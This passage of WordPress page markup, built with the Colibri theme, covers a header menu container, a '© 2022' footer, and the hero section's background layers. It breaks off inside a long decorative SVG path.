position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n <path 